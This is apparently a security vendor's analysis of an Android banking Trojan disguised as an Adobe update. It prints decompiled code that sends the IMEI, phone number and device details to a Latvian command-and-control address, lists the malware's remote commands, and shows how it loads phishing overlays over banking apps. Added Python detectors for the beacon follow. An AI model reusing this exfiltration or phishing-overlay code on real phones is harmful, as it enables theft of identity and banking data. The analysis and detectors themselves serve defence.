Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia

— Trustlook Research Team

Smartphones have permeated every corner of the world. After years of rapid growth, their popularity and usefulness now rival those of personal computers. Besides calling and texting, it is increasingly common for people to do their daily banking on a smartphone. With this computing capability, some traditional malware is shifting into the world of smartphones: it compromises the phone, changes the phone's behaviour, and receives instructions from a remote attacker to steal the user's information.

One such example is a newly discovered malicious app named "Adobe Update", which has the package name "droid.invisible". It is a phishing Trojan that targets the Android platform.

The sample's MD5 is D8616CDD54154B06A5E4D9D5B2A605E5. The package icon is shown below:

[Figure: package icon of the fake "Adobe Update" app]

On VirusTotal, only 3 of 57 antivirus vendors detected the sample when it was initially submitted.

[Figure: VirusTotal detection results]

The malware hides its own developer certificate information behind the name of a reputable enterprise:

[Figure: developer certificate of the malware sample]

Yet the official com.adobe.reader app on Google Play carries this legitimate developer certificate:

[Figure: developer certificate of the official Adobe app]

Upon installation, the malware presents the user with a misleading setup dialog box while replacing the default SMS app:

[Figure: default SMS app replacement dialog]

The app displays messages to entice the user into granting it device administrator rights, which it uses to maintain persistence on the system:

[Figure: device administrator request]

Once it holds device administrator rights, the app cannot be uninstalled by normal means:

[Figure: uninstall attempt blocked]

The app communicates with a remote server and sends out critical personal information:

  • Country
  • Device model
  • IMEI
  • Network operator
  • Cell phone number
  • Malware bot ID
  • OS version
  • Device name
  • OS API level

[Figure: captured network traffic (pcap) of the data upload]

The following decompiled code snippet demonstrates the above behaviour:

```java
class […] implements Runnable
{
    // […]
    Thread.sleep(20000L);
    Log.d("INVISIBLE-LOG", "[GATE SERVICE] - SEND MOBILE DATA");
    a.a.a.a.a locala = new a.a.a.a.a();                              // obfuscated helper classes
    x localx = new x();
    TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService("phone");
    localx.a("id", localTelephonyManager.getDeviceId());             // IMEI
    localx.a("country", localTelephonyManager.getNetworkCountryIso());
    localx.a("opname", localTelephonyManager.getNetworkOperatorName());
    localx.a("osversion", System.getProperty("os.version") + "(" + Build.VERSION.INCREMENTAL + ")");
    localx.a("osapilevel", Build.VERSION.RELEASE + "(" + Build.VERSION.SDK_INT + ")");
    localx.a("device", Build.DEVICE);
    localx.a("model", Build.MODEL + " (" + Build.PRODUCT + ")");
    localx.a("pnumber", localTelephonyManager.getLine1Number());     // cell phone number
    localx.a("botid", "777");
    locala.a("http://94.140.120.183/gate/receive.php", localx, new b(this)); // send the collected data to the C&C gate
    // […]
}
```
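As an added example (not code from the original post or from the sample itself), the following Python function recognises this check-in on the wire: it parses a raw HTTP request and only fires when a form-encoded POST to gate/receive.php carries all nine parameter names seen in the snippet. The request text, IMEI, phone number and carrier name are constructed sample values.

```python
from urllib.parse import parse_qs, urlsplit

# Parameter names the sample posts to gate/receive.php, taken from the decompiled snippet above.
BEACON_FIELDS = {"id", "country", "opname", "osversion", "osapilevel",
                 "device", "model", "pnumber", "botid"}

# Constructed HTTP request in the shape such a check-in would have on the wire.
# The IMEI, phone number and carrier name are made-up sample values.
SAMPLE_REQUEST = (
    "POST /gate/receive.php HTTP/1.1\r\n"
    "Host: 94.140.120.183\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "id=356938035643809&country=us&opname=ExampleCarrier"
    "&osversion=3.4.0(eng.1)&osapilevel=4.4.2(19)&device=hammerhead"
    "&model=Nexus+5+(hammerhead)&pnumber=%2B15555550100&botid=777"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlsplit(target).path, headers, body


def detect_beacon(raw):
    """Return a detection record if the request matches the sample's check-in, else None."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not path.endswith("/gate/receive.php"):
        return None
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if not BEACON_FIELDS <= set(fields):  # all nine parameters must be present
        return None
    return {
        "host": headers.get("host", ""),
        "imei": fields["id"],
        "phone": fields["pnumber"],
        "botid": fields["botid"],
        "device": fields["model"],
    }
```

The returned record carries the victim identifiers the sample leaks (IMEI, number, bot id), which is what an incident responder needs to tie the beacon to a specific handset.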

Furthermore, the malware receives commands from the C&C server and performs the corresponding functions:

  • loop  // wait for the next command
  • sms  // send an SMS message
  • readsms  // retrieve SMS messages and send them to the C&C server
  • ion  // not implemented; only writes to the log
  • ioff  // same as above
  • recall  // call the received numbers
  • fish  // show an attacker-controlled web page when a specific app is found running in the foreground

The following code snippets show how the malware checks the received command and then displays a phishing web page:

```java
if (paramArrayOfByte[0].equals("fish")) // compare command name
{
    Log.d("INVISIBLE-LOG", "[GATE SERVICE] :: FISH");
    // hand the command argument (the target list) to the InjectionScanner service
    this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra("data", paramArrayOfByte[1]));
}
// […]
```

```java
public class InjectionScanner extends Service
{
    int a = 0;
    String b;

    public String a()
    {
        // get the foreground running process name
        return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService("activity")).getRunningAppProcesses().get(0)).processName;
    }

    public void a(String paramString)
    {
        // scan for the target apps on a background daemon thread
        Thread localThread = new Thread(new g(this, paramString));
        localThread.setDaemon(true);
        localThread.start();
    }

    // […]

    public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
    {
        this.b = paramIntent.getStringExtra("data"); // target list received from the C&C server
        a();
        a(this.b);
        return paramInt1;
    }

    // […]
}
```

```java
if (this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray("apps").getString(j))) // compare the foreground running app name with the received string
{
    Intent localIntent = new Intent(this.b, InjectionActivity.class);
    localIntent.addFlags(268435456); // Intent.FLAG_ACTIVITY_NEW_TASK
    localIntent.putExtra("injection", localJSONObject.names().getString(i));
    this.b.startActivity(localIntent);
    this.b.a = 1;
    // […]
}
```

```java
@SuppressLint({"SetJavaScriptEnabled"})
protected void onCreate(Bundle paramBundle)
{
    super.onCreate(paramBundle);
    setContentView(2130968604); // layout resource id
    TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
    Intent localIntent = getIntent();
    WebView localWebView = (WebView)findViewById(2131492971); // WebView resource id
    localWebView.getSettings().setJavaScriptEnabled(true);
    localWebView.setWebViewClient(new f(this, null));
    localWebView.setWebChromeClient(new e(this, null));
    // show the phishing web page for the matched app, tagged with the device IMEI
    localWebView.loadUrl("http://94.140.120.183/injections/?bank=" + localIntent.getStringExtra("injection") + "&imei=" + localTelephonyManager.getDeviceId());
}
}
```

The malware displays the phishing web page when a specific app, for example a banking app, is found running in the foreground. The fraudsters persuade unsuspecting users to enter their financial details into that page and harvest all the information.
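To support triage of a captured "fish" command, here is an added Python example (not the post's or the sample's own code) that parses the target list in the shape the nested loop above reads, `{"<injection name>": {"apps": ["<package>", ...]}}`, reports which installed packages the payload aims at, and extracts the bank tag and IMEI from an injections/ request URL. The payload, injection names and package names are constructed; the JSON shape is inferred from the decompiled loop.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Constructed "fish" payload in the shape the decompiled loop reads:
# names().getString(i) -> injection name, getJSONObject(name).getJSONArray("apps") -> packages.
FISH_PAYLOAD = json.dumps({
    "examplebank": {"apps": ["com.example.bank", "com.example.bank.lite"]},
    "examplepay": {"apps": ["com.example.pay"]},
})


def parse_targets(payload):
    """Return {injection_name: [target packages]}; malformed entries yield an empty list."""
    data = json.loads(payload)
    if not isinstance(data, dict):
        return {}
    targets = {}
    for name, entry in data.items():
        apps = entry.get("apps", []) if isinstance(entry, dict) else []
        targets[name] = [app for app in apps if isinstance(app, str)]
    return targets


def injection_for(targets, foreground_process):
    """Injection name the sample would open for this foreground process (first match wins), or None."""
    for name, apps in targets.items():
        if foreground_process in apps:
            return name
    return None


def targeted_installed(targets, installed_packages):
    """Map each installed package named in the payload to the injections aimed at it."""
    hits = {}
    for name, apps in targets.items():
        for app in apps:
            if app in installed_packages:
                hits.setdefault(app, []).append(name)
    return hits


def parse_injection_url(url):
    """Pull the bank tag and IMEI out of an injections/?bank=...&imei=... request, or None."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if not parts.path.endswith("/injections/") or not {"bank", "imei"} <= set(query):
        return None
    return {"host": parts.hostname, "bank": query["bank"], "imei": query["imei"]}
```

Running `targeted_installed` against a device's package list tells a responder which users of which apps were at risk, and `parse_injection_url` over proxy logs shows which injection was actually served to which IMEI.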

The C&C server 94.140.120.183 is located in Latvia:

http://whois.domaintools.com/94.140.120.183

[Figure: WHOIS lookup result for 94.140.120.183]
